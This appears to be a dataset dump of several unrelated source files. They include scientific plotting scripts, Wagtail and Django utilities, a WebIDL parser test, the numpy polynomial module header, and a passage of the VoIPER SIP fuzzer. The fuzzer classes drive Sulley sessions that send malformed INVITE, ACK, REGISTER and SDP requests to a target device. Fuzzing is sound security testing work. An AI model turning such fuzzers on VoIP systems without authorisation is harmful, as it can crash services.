p2 = stats.norm.pdf(x2, mu2, std2)
plt.plot(x1, p1, 'k',label='Wild types (fit results: mu=%.2f,std=%.2f)'%(mu1, std1))
plt.plot(x2, p2, 'r',label='Deleterious DIDA mutants \n(fit results: mu=%.2f,std=%.2f)'%(mu2, std2))
plt.xlabel('Aggregation conformation predicted values (amylogenic regions)')
plt.ylabel('Frequency')
plt.xlim(0,100)
plt.ylim(0,0.06)
plt.legend(loc='upper right')
fig.savefig('histwaltzenvt_missense.png')
#missense_wt - missense_mut
miss=[]
[miss.append(a_i - b_i) for a_i, b_i in zip(x, y)]
#KOLMOGOROV-SMIRNOV:
stats.kstest(miss,'norm') # (D,pvalue) = (0.34964202670995748, 0.0)
#So we reject H0 -> not normal distribution
#WILCOXON TEST:
stats.wilcoxon(miss) #-> (T, pvalue) = (8711.0, 0.55024961096028457)
#So we do not reject H0 -> There is no significant difference between wt and mut
#-----------------------------------------------------------------------------
# OUTLIERS FOR AGGREGATION
#-----------------------------------------------------------------------------
pred_wt = getColumn(file_wt,3,'\t')
pred_mut = getColumn(file_mut,3,'\t')
pred_wt.pop(0)
pred_mut.pop(0)
pred_envt_wt = getColumn(file_wt,4,'\t')
pred_envt_mut = getColumn(file_mut,4,'\t')
pred_envt_wt.pop(0)
pred_envt_mut.pop(0)
variant_liste = getColumn(file_wt,0,'\t')
output = open('waltz_outliers.csv','w')
output.write('ID,agg_wt,agg_mut,difference,agg_envt_wt,agg_envt_mut,difference_envt\n')
for i in range(0,len(pred_wt)):
for j in range(0,len(pred_mut)):
if i==j:
if pred_wt[i]!='NA'and pred_mut[j]!='NA':
if (abs(float(pred_wt[i])-float(pred_mut[j]))) > 20:
output.write(variant_liste[i+1] + ',' + pred_wt[i] + ',' + pred_mut[j] + ',' + str(abs(float(pred_wt[i])-float(pred_mut[j]))) + ',' + pred_envt_wt[i] + ',' + pred_envt_mut[i] + ',' + str(abs(float(pred_envt_wt[i])-float(pred_envt_mut[j]))) + '\n')
output.close()
#-------------------------------------------------------------------------------
#COMPARISON WITH NETSURFP RSA
#-------------------------------------------------------------------------------
W_wt = pd.read_csv(file_wt,'\t')
W_mut = pd.read_csv(file_mut,'\t')
W_wt['DWaltz'] = ''
W_wt['DWaltz'] = W_wt.aggregation - W_mut.aggregation
W_wt['DWaltz_envt'] = ''
W_wt['DWaltz_envt'] = W_wt.aggregation_envt - W_mut.aggregation_envt
W_wt = W_wt.drop(['aggregation','aggregation_envt'], 1)
W_wt.to_csv('waltzresults_compare.csv', index=False)
#RESIDUE
waltz = getColumn('waltzresults_compare.csv',3,',')
waltz.pop(0)
netsurfp = getColumn('netsurfpresults_compare.csv',3,',')
netsurfp.pop(0)
x,y=[],[]
for i in range(0,len(netsurfp)): #min=-0.183 and max=0.302
if netsurfp[i]=='':
x.append(np.nan)
else:
x.append(float(netsurfp[i]))
for i in range(0,len(waltz)): #min=-98.862207 and max=98.327759
if waltz[i]=='':
y.append(np.nan)
else:
y.append(float(waltz[i]))
fig = plt.figure()
plt.scatter(x, y,edgecolor = 'none', c= 'k')
plt.grid('on')
plt.xlim(-0.4,0.4)
plt.ylim(-100,100)
plt.xlabel('delta(Solvent accessibility prediction) by NetSurfP')
plt.ylabel('delta(Aggregation conformation prediction) by Waltz')
fig.savefig('WaltzVSnetsurfp.jpg')
#ENVIRONMENT
waltz_envt = getColumn('waltzresults_compare.csv',4,',')
waltz_envt.pop(0)
netsurfp_envt = getColumn('netsurfpresults_compare.csv',4,',')
netsurfp_envt.pop(0)
x,y=[],[]
for i in range(0,len(netsurfp_envt)): #min=-0.183 and max=0.302
if netsurfp_envt[i]=='':
x.append(np.nan)
else:
x.append(float(netsurfp_envt[i]))
for i in range(0,len(waltz_envt)): #min=-98.862207 and max=98.327759
if waltz_envt[i]=='':
y.append(np.nan)
else:
y.append(float(waltz_envt[i]))
fig = plt.figure()
plt.scatter(x, y,edgecolor = 'none', c= 'k')
plt.grid('on')
plt.xlim(-0.4,0.4)
plt.ylim(-100,100)
plt.xlabel('delta(Solvent accessibility prediction) by NetSurfP')
plt.ylabel('delta(Aggregation conformation prediction) by Waltz')
fig.savefig('WaltzVSnetsurfp_envt.jpg')
| mit | 942,647,626,473,666,200 | 30.836134 | 268 | 0.599974 | false |
kurtrwall/wagtail | wagtail/utils/deprecation.py | 2 | 1995 | from __future__ import absolute_import, unicode_literals
import warnings
class RemovedInWagtail17Warning(DeprecationWarning):
pass
removed_in_next_version_warning = RemovedInWagtail17Warning
class RemovedInWagtail18Warning(PendingDeprecationWarning):
pass
class ThisShouldBeAList(list):
"""
Some properties - such as Indexed.search_fields - used to be tuples. This
is incorrect, and they should have been lists. Changing these to be a list
now would be backwards incompatible, as people do
.. code-block:: python
        search_fields = Page.search_fields + (
            SearchField('body'),
        )
Adding a tuple to the end of a list causes an error.
This class will allow tuples to be added to it, as in the above behaviour,
but will raise a deprecation warning if someone does this.
"""
message = 'Using a {type} for {name} is deprecated, use a list instead'
def __init__(self, items, name, category):
super(ThisShouldBeAList, self).__init__(items)
self.name = name
self.category = category
def _format_message(self, rhs):
return self.message.format(name=self.name, type=type(rhs).__name__)
def __add__(self, rhs):
cls = type(self)
if isinstance(rhs, tuple):
# Seems that a tuple was passed in. Raise a deprecation
# warning, but then keep going anyway.
message = self._format_message(rhs)
warnings.warn(message, category=self.category, stacklevel=2)
rhs = list(rhs)
return cls(super(ThisShouldBeAList, self).__add__(list(rhs)),
name=self.name, category=self.category)
class SearchFieldsShouldBeAList(ThisShouldBeAList):
"""
Indexed.search_fields was a tuple, but it should have been a list
"""
def __init__(self, items, name='search_fields', category=RemovedInWagtail17Warning):
super(SearchFieldsShouldBeAList, self).__init__(items, name, category)
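# Usage sketch (hypothetical `Page` model; illustrative only): appending a
# tuple still works but triggers the warning defined above, e.g.
#
#   search_fields = SearchFieldsShouldBeAList(Page.search_fields) + (
#       SearchField('body'),
#   )
#
# which warns "Using a tuple for search_fields is deprecated, use a list
# instead" while still returning a SearchFieldsShouldBeAList.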
| bsd-3-clause | 5,485,424,418,171,346,000 | 31.704918 | 88 | 0.665163 | false |
paulballesty/zxcvbn | data-scripts/count_wiktionary.py | 16 | 2670 | #!/usr/bin/python
import os
import sys
import codecs
import operator
from unidecode import unidecode
def usage():
return '''
This script extracts words and counts from a 2006 wiktionary word frequency study over American
television and movies. To use, first visit the study and download, as .html files, all 26 of the
frequency lists:
https://en.wiktionary.org/wiki/Wiktionary:Frequency_lists#TV_and_movie_scripts
Put those into a single directory and point it to this script:
%s wiktionary_html_dir ../data/us_tv_and_film.txt
output.txt will include one line per word in the study, ordered by rank, of the form:
word1 count1
word2 count2
...
''' % sys.argv[0]
def parse_wiki_tokens(html_doc_str):
'''fragile hax, but checks the result at the end'''
results = []
last3 = ['', '', '']
header = True
skipped = 0
for line in html_doc_str.split('\n'):
last3.pop(0)
last3.append(line.strip())
if all(s.startswith('<td>') and not s == '<td></td>' for s in last3):
if header:
header = False
continue
last3 = [s.replace('<td>', '').replace('</td>', '').strip() for s in last3]
rank, token, count = last3
rank = int(rank.split()[0])
token = token.replace('</a>', '')
token = token[token.index('>')+1:]
token = normalize(token)
            # wiktionary has thousands of words that end in 's
# keep the common ones (rank under 1000), discard the rest
#
# otherwise end up with a bunch of duplicates eg victor / victor's
if token.endswith("'s") and rank > 1000:
skipped += 1
continue
count = int(count)
results.append((rank, token, count))
# early docs have 1k entries, later 2k, last 1284
assert len(results) + skipped in [1000, 2000, 1284]
return results
def normalize(token):
return unidecode(token).lower()
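# For example, normalize(u'Fiancé') returns 'fiance': unidecode
# transliterates the accented character before lowercasing, so spelling
# variants collapse onto a single token.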
def main(wiktionary_html_root, output_filename):
rank_token_count = [] # list of 3-tuples
for filename in os.listdir(wiktionary_html_root):
path = os.path.join(wiktionary_html_root, filename)
with codecs.open(path, 'r', 'utf8') as f:
rank_token_count.extend(parse_wiki_tokens(f.read()))
rank_token_count.sort(key=operator.itemgetter(0))
with codecs.open(output_filename, 'w', 'utf8') as f:
for rank, token, count in rank_token_count:
f.write('%-18s %d\n' % (token, count))
if __name__ == '__main__':
if len(sys.argv) != 3:
print usage()
else:
main(*sys.argv[1:])
sys.exit(0)
| mit | 4,693,949,418,690,449,000 | 32.375 | 96 | 0.601873 | false |
LighthouseHPC/lighthouse | src/Dlighthouse/lighthouse/views/lapack_sylvester.py | 2 | 8761 | import string, types, sys, os, StringIO, re, shlex, json, zipfile
from collections import OrderedDict
from itertools import chain
from django.contrib.auth.decorators import login_required
from django.core.servers.basehttp import FileWrapper
from django.http import HttpResponse, HttpResponseNotFound
from django.shortcuts import render_to_response, redirect, render
from django.template import RequestContext
from django.template.loader import render_to_string
from django.views.decorators.csrf import csrf_exempt
from lighthouse.forms.lapack_sylvester import *
from lighthouse.models.lapack_sylvester import lapack_sylvester
from lighthouse.models.lapack_choiceDict import *
from lighthouse.views.lapack_eigen import question_and_answer
import datetime
##############################################
######--------- Guided Search --------- ######
##############################################
form_order_standard = ('standardGeneralizedForm', 'complexNumberForm', 'standardConditionForm', 'singleDoubleForm') ## form order for standard Sylvester equation
form_order_generalized = ('standardGeneralizedForm', 'complexNumberForm', 'generalizedConditionForm', 'singleDoubleForm') ## form order for generalized Sylvester equation
form_HTML = ['standardGeneralizedForm', 'standardConditionForm', 'generalizedConditionForm'] ## forms with HTML format
### helper functions
def find_nextForm(currentForm_name, request):
print request.session['form_order']
current_index = request.session['form_order'].index(currentForm_name)
nextForm_name = ""
nextForm = ""
try:
        ## advance to the next form in the configured question order
next_index = next(i for i in range(current_index+1, len(request.session['form_order'])))
nextForm_name = request.session['form_order'][next_index]
print nextForm_name
nextForm = getattr(sys.modules[__name__], nextForm_name)()
## the end of the guided search or other errors
except Exception as e:
print type(e)
print "e.message: ", e.message
print "e.args: ", e.args
return {'nextForm_name': nextForm_name, 'nextForm': nextForm}
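# Illustrative note: with form_order_standard above, answering
# 'standardGeneralizedForm' makes 'complexNumberForm' the next form; the
# class of that name is then instantiated from this module via getattr.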
### set up initial sessions
def sessionSetup(request):
for item in ['standardGeneralizedForm', 'standardConditionForm', 'generalizedConditionForm', 'complexNumberForm', 'singleDoubleForm']:
key = 'sylvester_'+item[:-4]
request.session[key] = ''
request.session['currentForm_name'] = 'standardGeneralizedForm'
request.session['Results'] = lapack_sylvester.objects.all()
request.session['sylvester_guided_answered'] = OrderedDict()
request.session['form_order'] = []
### start guided search views
def index(request):
# set up session keys and values
sessionSetup(request)
## get ready for the template
context = {
'formHTML': "standardGeneralizedForm",
'form': "invalid",
'sylvester_guided_answered' : '',
'results' : 'start',
}
return render_to_response('lighthouse/lapack_sylvester/index.html', context_instance=RequestContext(request, context))
def guidedSearch(request):
form = getattr(sys.modules[__name__], request.session['currentForm_name'])(request.GET or None)
if form.is_valid():
## get current question and user's answer
current_question = request.session['currentForm_name'][:-4]
formField_name = 'sylvester_'+current_question
value = form.cleaned_data[formField_name]
choices = form.fields[formField_name].choices
request.session['sylvester_guided_answered'].update(question_and_answer(form, value, choices))
## generate a session for current question/answer -->request.session[sylvester_currentQuestion] = answer
request.session[formField_name] = value
## decide which form order to use
if request.session['currentForm_name'] == 'standardGeneralizedForm' and request.session['sylvester_standardGeneralized'] == 'standard':
request.session['form_order'] = form_order_standard
elif request.session['currentForm_name'] == 'standardGeneralizedForm' and request.session['sylvester_standardGeneralized'] == 'generalized':
request.session['form_order'] = form_order_generalized
if request.session['sylvester_standardCondition'] == 'no' or request.session['sylvester_generalizedCondition'] == 'no': ## stop search
return index(request)
else:
## do search based on user's response (no search needed for 'standardConditionForm', 'generalizedConditionForm')
if request.session['currentForm_name'] not in ['standardConditionForm', 'generalizedConditionForm']:
lookup = "%s__contains" % current_question
query = {lookup : value}
request.session['Results'] = request.session['Results'].filter(**query)
## call function find_nextForm to set up next form for next question
dict_nextQuestion = find_nextForm(request.session['currentForm_name'], request)
nextForm_name = dict_nextQuestion['nextForm_name']
nextForm = dict_nextQuestion['nextForm']
## make next form current for request.session['currentForm_name']
request.session['currentForm_name'] = nextForm_name
## decide whether or not to use form HTML files (if help buttons are needed, use HTML file instead of form)
if nextForm_name in form_HTML:
formHTML = nextForm_name
else:
formHTML = "invalid"
## get ready for the template
context = {
'formHTML': formHTML,
'form': nextForm,
'sylvester_guided_answered' : request.session['sylvester_guided_answered'],
'results' : request.session['Results']
}
return render_to_response('lighthouse/lapack_sylvester/index.html', context_instance=RequestContext(request, context))
else:
return index(request)
##############################################
######-------- Advanced Search -------- ######
##############################################
def advancedSearch(request):
standardDict = {'complexNumber':[], 'singleDouble':[]}
generalizedDict = {'complexNumber':[], 'singleDouble':[]}
request.session['advancedResults'] = []
form = advancedForm(request.POST or None)
### search for standard routines
if form['standard_search'].value() == 'yes':
## get standard data
standardDict['complexNumber'] = form['standard_complexNumber'].value()
standardDict['singleDouble'] = form['standard_singleDouble'].value()
## search for standard routines
for item1 in standardDict['complexNumber']:
for item2 in standardDict['singleDouble']:
kwargs = {
'standardGeneralized': 'standard',
'complexNumber': item1,
'singleDouble': item2,
}
request.session['advancedResults'].extend(lapack_sylvester.objects.filter(**kwargs))
### search for generalized routines
if form['generalized_search'].value() == 'yes':
## get generalized data
generalizedDict['complexNumber'] = form['generalized_complexNumber'].value()
generalizedDict['singleDouble'] = form['generalized_singleDouble'].value()
## search for generalized routines
for item1 in generalizedDict['complexNumber']:
for item2 in generalizedDict['singleDouble']:
print item1, item2
kwargs = {
'standardGeneralized': 'generalized',
'complexNumber': item1,
'singleDouble': item2,
}
request.session['advancedResults'].extend(lapack_sylvester.objects.filter(**kwargs))
## be ready for switching to guided search
sessionSetup(request)
## context includes guided search form
context = {
'form_submitted': form,
'results': request.session['advancedResults'],
'AdvancedTab': True,
'formHTML': "standardGeneralizedForm",
'form': "invalid",
'sylvester_guided_answered' : '',
}
return render_to_response('lighthouse/lapack_sylvester/index.html', context_instance=RequestContext(request, context))
| mit | 4,027,494,882,457,814,500 | 43.472081 | 172 | 0.622189 | false |
deadlyraptor/reels | spreadchimp.py | 1 | 2493 | import os
import csv
import xlrd
# Assumes the directory with the workbook is relative to the script's location.
directory = 'workbooks/'
file = os.listdir(directory)[0]
workbook = (f'{directory}/{file}')
# Preps the workbook that contains the information desired.
wb = xlrd.open_workbook(workbook)
sh = wb.sheet_by_index(0)
total_rows = sh.nrows
first_row = 6 # skips the first six rows as they are irrelevant.
# Collects the names of all the films for which individual workbooks need to be
# created.
films = []
for row in range(first_row, total_rows):
row_values = sh.row_values(row)
film_title = row_values[20]
if film_title in films:
pass
else:
films.append(film_title)
def prep_contacts(film):
'''Collects all contacts that match the given film into a list that will be
used to write to the actual spreadsheet.
Arguments:
film = The film that contacts purchased tickets for.
Returns:
contacts = The list of all contacts for a given film.
'''
contacts = []
for row in range(first_row, total_rows):
contact = []
row_values = sh.row_values(row)
opt_in = row_values[5]
film_title = row_values[20]
if not opt_in:
continue
elif opt_in and film_title == film:
address = '{0} {1} {2} {3} {4}'.format(
row_values[11], # address 1
row_values[12], # address 2
row_values[13].title(), # city
row_values[14], # state
row_values[15]) # zip
contact = [row_values[3], # email
row_values[2].title(), # first name
row_values[1].title(), # last name
row_values[16].replace('No Primary Phone', ''), # phone
address] # full address
contacts.append(contact)
return contacts
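# Each film then gets its own spreadsheet: the loop below calls
# prep_contacts once per title and writes one row per opted-in contact under
# the headers defined next.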
headers = ['Email', 'First Name', 'Last Name', 'Phone', 'Full Address']
for film in films:
contacts = prep_contacts(film)
with open(f'{film}.csv', mode='w') as outfile:
writer = csv.writer(outfile, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
writer.writerow(headers)
for contact in contacts:
writer.writerow(contact)
| mit | 7,726,040,187,664,603,000 | 34.112676 | 79 | 0.546731 | false |
satishgoda/bokeh | examples/plotting/file/unemployment.py | 46 | 1846 | from collections import OrderedDict
import numpy as np
from bokeh.plotting import ColumnDataSource, figure, show, output_file
from bokeh.models import HoverTool
from bokeh.sampledata.unemployment1948 import data
# Read in the data with pandas. Convert the year column to string
data['Year'] = [str(x) for x in data['Year']]
years = list(data['Year'])
months = ["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"]
data = data.set_index('Year')
# this is the colormap from the original plot
colors = [
"#75968f", "#a5bab7", "#c9d9d3", "#e2e2e2", "#dfccce",
"#ddb7b1", "#cc7878", "#933b41", "#550b1d"
]
# Set up the data for plotting. We will need to have values for every
# pair of year/month names. Map the rate to a color.
month = []
year = []
color = []
rate = []
for y in years:
for m in months:
month.append(m)
year.append(y)
monthly_rate = data[m][y]
rate.append(monthly_rate)
color.append(colors[min(int(monthly_rate)-2, 8)])
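# Note (illustrative): with nine colors above, int(monthly_rate) - 2 places
# rates of roughly 2-10% into bins 0-8, and min(..., 8) clamps higher rates
# into the darkest bin; rates below 2% would index from the end of the list.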
source = ColumnDataSource(
data=dict(month=month, year=year, color=color, rate=rate)
)
output_file('unemployment.html')
TOOLS = "resize,hover,save,pan,box_zoom,wheel_zoom"
p = figure(title="US Unemployment (1948 - 2013)",
x_range=years, y_range=list(reversed(months)),
x_axis_location="above", plot_width=900, plot_height=400,
toolbar_location="left", tools=TOOLS)
p.rect("year", "month", 1, 1, source=source,
color="color", line_color=None)
p.grid.grid_line_color = None
p.axis.axis_line_color = None
p.axis.major_tick_line_color = None
p.axis.major_label_text_font_size = "5pt"
p.axis.major_label_standoff = 0
p.xaxis.major_label_orientation = np.pi/3
hover = p.select(dict(type=HoverTool))
hover.tooltips = OrderedDict([
('date', '@month @year'),
('rate', '@rate'),
])
show(p) # show the plot
| bsd-3-clause | -3,850,662,520,255,630,000 | 27.84375 | 82 | 0.667389 | false |
birryree/servo | components/script/dom/bindings/codegen/parser/tests/test_conditional_dictionary_member.py | 120 | 3162 | def WebIDLTest(parser, harness):
parser.parse("""
dictionary Dict {
any foo;
[ChromeOnly] any bar;
};
""")
results = parser.finish()
harness.check(len(results), 1, "Should have a dictionary")
members = results[0].members;
harness.check(len(members), 2, "Should have two members")
# Note that members are ordered lexicographically, so "bar" comes
# before "foo".
harness.ok(members[0].getExtendedAttribute("ChromeOnly"),
"First member is not ChromeOnly")
harness.ok(not members[1].getExtendedAttribute("ChromeOnly"),
"Second member is ChromeOnly")
parser = parser.reset()
parser.parse("""
dictionary Dict {
any foo;
any bar;
};
interface Iface {
[Constant, Cached] readonly attribute Dict dict;
};
""")
results = parser.finish()
harness.check(len(results), 2, "Should have a dictionary and an interface")
parser = parser.reset()
exception = None
try:
parser.parse("""
dictionary Dict {
any foo;
[ChromeOnly] any bar;
};
interface Iface {
[Constant, Cached] readonly attribute Dict dict;
};
""")
results = parser.finish()
except Exception, exception:
pass
harness.ok(exception, "Should have thrown.")
harness.check(exception.message,
"[Cached] and [StoreInSlot] must not be used on an attribute "
"whose type contains a [ChromeOnly] dictionary member",
"Should have thrown the right exception")
parser = parser.reset()
exception = None
try:
parser.parse("""
dictionary ParentDict {
[ChromeOnly] any bar;
};
dictionary Dict : ParentDict {
any foo;
};
interface Iface {
[Constant, Cached] readonly attribute Dict dict;
};
""")
results = parser.finish()
except Exception, exception:
pass
harness.ok(exception, "Should have thrown (2).")
harness.check(exception.message,
"[Cached] and [StoreInSlot] must not be used on an attribute "
"whose type contains a [ChromeOnly] dictionary member",
"Should have thrown the right exception (2)")
parser = parser.reset()
exception = None
try:
parser.parse("""
dictionary GrandParentDict {
[ChromeOnly] any baz;
};
dictionary ParentDict : GrandParentDict {
any bar;
};
dictionary Dict : ParentDict {
any foo;
};
interface Iface {
[Constant, Cached] readonly attribute Dict dict;
};
""")
results = parser.finish()
except Exception, exception:
pass
harness.ok(exception, "Should have thrown (3).")
harness.check(exception.message,
"[Cached] and [StoreInSlot] must not be used on an attribute "
"whose type contains a [ChromeOnly] dictionary member",
"Should have thrown the right exception (3)")
| mpl-2.0 | -8,570,901,832,487,830,000 | 27.745455 | 80 | 0.568627 | false |
firebitsbr/raspberry_pwn | src/pentest/voiper/fuzzer/fuzzers.py | 8 | 10273 | '''
This file is part of VoIPER.
VoIPER is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
VoIPER is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with VoIPER. If not, see <http://www.gnu.org/licenses/>.
Copyright 2008, http://www.unprotectedhex.com
Contact: nnp@unprotectedhex.com
'''
import sys
import os
import string
import time
# modify import path instead of adding a __init__.py as I want to keep
# the Sulley install as unmodified as possible to facilitate easy updating
# if there are changes to it.
# Props to Pedram Amini and Aaron Portnoy for creating such a great framework
sys.path.append(''.join([os.getcwd(), '/sulley']))
from random import Random
from protocol_logic.sip_agent import T_COMPLETE_OK
from protocol_logic.sip_utilities import SIPCrashDetector
from protocol_logic.sip_utilities import SIPInviteCanceler
from protocol_logic import sip_parser
from misc.utilities import Logger
from fuzzer_parents import AbstractFuzzer
from fuzzer_parents import AbstractSIPFuzzer
from fuzzer_parents import AbstractSIPInviteFuzzer
from socket import *
from sulley import *
################################################################################
class Callable:
def __init__(self, anycallable):
'''
Wrapper class so I can have unbound class methods. Apparently python doesn't
allow these by default. This code/idiom came from some standard example on the
Interwebs
'''
self.__call__ = anycallable
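# Sketch of the idiom (illustrative only): wrapping a plain function in
# Callable mirrors how the info() methods are wrapped below, letting them be
# called without an instance, e.g.
#
#   class Example:
#       def greet():
#           return 'static-ish'
#       greet = Callable(greet)
#
#   Example.greet()  # no instance needed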
class SIPInviteStructureFuzzer(AbstractSIPInviteFuzzer):
'''
Fuzz the structure of an INVITE request e.g repeats, line folding etc
'''
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("INVITE_STRUCTURE"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPInviteStructureFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Low\n",
"Fuzzes the structure of a SIP request by repeating blocks, fuzzing delimiters and ",
"generally altering how a SIP request is structured",
]
return ''.join(h)
info = Callable(info)
class SIPInviteRequestLineFuzzer(AbstractSIPInviteFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("INVITE_REQUEST_LINE"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPInviteRequestLineFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Low\n",
"Extensively tests the first line of an INVITE request by including all valid parts ",
"specified in SIP RFC 3375"
]
return ''.join(h)
info = Callable(info)
class SIPInviteCommonFuzzer(AbstractSIPInviteFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("INVITE_COMMON"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPInviteCommonFuzzer\n",
"Protocol: SIP\n",
"Success Factor: High\n",
"Fuzzes the headers commonly found and most likely to be processed in a SIP INVITE request\n"
]
return ''.join(h)
info = Callable(info)
class SIPInviteOtherFuzzer(AbstractSIPInviteFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("INVITE_OTHER"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPInviteOtherFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Low\n",
"Tests all other headers specified as part of an INVITE besides those found in the ",
"SIPInviteCommonFuzzer. Many of these are seemingly unparsed and ignored by a lot of devices.\n"
]
return ''.join(h)
info = Callable(info)
class SDPFuzzer(AbstractSIPInviteFuzzer):
'''
Extends the Abstract INVITE fuzzer because it requires the INVITE
cancelling functionality. Fuzzes the SDP content of an INVITE.
'''
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("SDP"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SDPFuzzer\n",
"Protocol: SDP\n",
"Success Factor: High\n",
"Fuzzes the SDP protocol as part of a SIP INVITE\n"
]
return ''.join(h)
info = Callable(info)
class SIPDumbACKFuzzer(AbstractSIPFuzzer):
'''
A dumb ACK fuzzer that doesn't wait for any kind of responses or what not.
'''
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("ACK"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPDumbACKFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A dumb ACK fuzzer with no transaction state awareness. \n",
]
return ''.join(h)
info = Callable(info)
class SIPDumbCANCELFuzzer(AbstractSIPFuzzer):
'''
A dumb CANCEL fuzzer that doesn't wait for any kind of responses or what not.
'''
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("CANCEL"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPDumbCANCELFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A dumb CANCEL request fuzzer with no transaction state awareness\n",
]
return ''.join(h)
info = Callable(info)
class SIPDumbREGISTERFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("REGISTER"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPDumbREGISTERFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A dumb REGISTER request fuzzer with no transaction state awareness\n",
]
return ''.join(h)
info = Callable(info)
class SIPSUBSCRIBEFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("SUBSCRIBE"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPSUBSCRIBEFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A fuzzer for the SUBSCRIBE SIP verb\n",
]
return ''.join(h)
info = Callable(info)
class SIPNOTIFYFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("NOTIFY"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPNOTIFYFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A fuzzer for the NOTIFY SIP verb\n",
]
return ''.join(h)
info = Callable(info)
class SIPACKFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.invite_cancel_dict = {
sip_parser.r_SEND : (self.invite.process,
{sip_parser.r_1XX : (self.cancel.process,
{sip_parser.r_4XX : (None, None),
sip_parser.r_5XX : (None, None),
sip_parser.r_6XX : (None, None),
sip_parser.r_2XX : (None, None),
}
)
}
)
}
self.pre_send_functions.append(self.invite_cancel)
self.sess.add_target(self.target)
self.sess.connect(s_get("ACK"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPACKFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A fuzzer for the ACK SIP verb that first attempts to manipulate the target device into a state where it would expect an ACK\n",
]
return ''.join(h)
info = Callable(info)
def invite_cancel(self, sock):
result = None
while result != T_COMPLETE_OK:
result, self.curr_invite_branch = self.sip_agent.process_transaction(
self.invite_cancel_dict,
self.response_q,
self.request_q,
{'user' : self.user,
'target_user' : self.target_user,
'host' : self.host,
'port' : self.port}
)
if result != T_COMPLETE_OK:
print >>sys.stderr, 'Invite cancel for ACK fuzz didnt complete. Trying again'
time.sleep(.2)
'''
class SDPEncodedFuzzer(AbstractSIPInviteFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("SDP_ENCODED"), callback=self.generate_unique_attributes)
self.sess.fuzz()
class OptionsFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("OPTIONS"), callback=self.generate_unique_attributes)
self.sess.fuzz()
'''
################################################################################
| gpl-3.0 | 7,845,512,082,045,229,000 | 33.129568 | 141 | 0.591064 | false |
bakkou-badri/dataminingproject | env/lib/python2.7/site-packages/numpy/polynomial/polynomial.py | 14 | 47103 | """
Objects for dealing with polynomials.
This module provides a number of objects (mostly functions) useful for
dealing with polynomials, including a `Polynomial` class that
encapsulates the usual arithmetic operations. (General information
on how this module represents and works with polynomial objects is in
the docstring for its "parent" sub-package, `numpy.polynomial`).
Constants
---------
- `polydomain` -- Polynomial default domain, [-1,1].
- `polyzero` -- (Coefficients of the) "zero polynomial."
- `polyone` -- (Coefficients of the) constant polynomial 1.
- `polyx` -- (Coefficients of the) identity map polynomial, ``f(x) = x``.
Arithmetic
----------
- `polyadd` -- add two polynomials.
- `polysub` -- subtract one polynomial from another.
- `polymul` -- multiply two polynomials.
- `polydiv` -- divide one polynomial by another.
- `polypow` -- raise a polynomial to an positive integer power
- `polyval` -- evaluate a polynomial at given points.
- `polyval2d` -- evaluate a 2D polynomial at given points.
- `polyval3d` -- evaluate a 3D polynomial at given points.
- `polygrid2d` -- evaluate a 2D polynomial on a Cartesian product.
- `polygrid3d` -- evaluate a 3D polynomial on a Cartesian product.
Calculus
--------
- `polyder` -- differentiate a polynomial.
- `polyint` -- integrate a polynomial.
Misc Functions
--------------
- `polyfromroots` -- create a polynomial with specified roots.
- `polyroots` -- find the roots of a polynomial.
- `polyvander` -- Vandermonde-like matrix for powers.
- `polyvander2d` -- Vandermonde-like matrix for 2D power series.
- `polyvander3d` -- Vandermonde-like matrix for 3D power series.
- `polycompanion` -- companion matrix in power series form.
- `polyfit` -- least-squares fit returning a polynomial.
- `polytrim` -- trim leading coefficients from a polynomial.
- `polyline` -- polynomial representing given straight line.
Classes
-------
- `Polynomial` -- polynomial class.
See also
--------
`numpy.polynomial`
"""
from __future__ import division, absolute_import, print_function
